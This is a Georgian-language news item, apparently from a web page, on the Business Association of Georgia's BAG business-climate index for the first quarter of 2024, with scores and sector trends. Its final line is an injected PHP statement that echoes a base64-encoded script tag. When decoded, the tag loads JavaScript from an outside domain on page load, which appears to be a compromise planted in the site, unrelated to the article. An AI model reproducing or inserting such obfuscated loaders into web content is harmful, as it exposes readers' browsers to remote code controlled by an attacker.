celsiusi
ავერსი შნაიდერი

 საქართველოს ბიზნეს ასოციაცია BAG ინდექსის 2024 წლის I კვარტალის შედეგებს აქვეყნებს, რომლის მიხედვით, ბიზნეს კლიმატის მაჩვენებელმა 43.6 ქულა შეადგინა და წინა კვარტალების მსგავსად, ბუმის ფაზაში იმყოფება, რასაც განაპირობებს როგორც ბიზნესის ოპტიმისტური მოლოდინის არსებობა, ასევე მიმდინარე მდგომარეობის პოზიტიურად შეფასება.

აღსანიშნავია, რომ ბიზნესის მოლოდინის მაჩვენებელმა 60.8 ქულას მიაღწია, რაც უპრეცედენტოდ მაღალი მაჩვენებელია ინდექსის წარმოების ისტორიაში. განსაკუთრებით გაუმჯობესებულია მოლოდინები ვაჭრობის, მშენებლობისა და მომსახურების სექტორებში.

რაც შეეხება მიმდინარე მდგომარეობის შეფასებას, 2024 წლის I კვარტალში წინა კვარტალთან შედარებით, მაჩვენებლები გაუარესდა ვაჭრობისა და მომსახურების სექტორებში. აღნიშნული, სავარაუდოდ, განაპირობა I კვარტალში შემცირებულმა გაყიდვებმა, რაც ზემოხსენებულ სექტორებში გამოკითხულმა კომპანიებმა დააფიქსირეს. თუმცა შეიძლება ითქვას, რომ I კვარტალში მეოთხე კვარტალთან შედარებით, ვაჭრობისა და მომსახურების სექტორებში გაყიდვების შემცირება, ხოლო მეორე კვარტალიდან გაყიდვების ზრდა, ერთგვარ ტენდენციად ჩამოყალიბდა, შესაბამისად, ამავე სექტორებში გაზრდილი პოზიტიური მოლოდინები, შესაძლოა დიდწილად, აღნიშნული ფაქტორით იყოს განპირობებული.

ინფორმაციისთვის, BAG ინდექსი ემყარება საქართველოს ბიზნეს ასოციაციის წევრებისა და მათ ჯგუფში შემავალი კომპანიების შეფასებებს, რომელსაც საქართველოს ბიზნეს ასოციაცია და PMC კვლევითი ცენტრი ifo ეკონომიკური კვლევების გერმანული ინსტიტუტის მეთოდოლოგიაზე დაყრდნობით აწარმოებს.

კვლევის ანგარიში შეგიძლიათ იხილოთ ბმულზე.

226
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");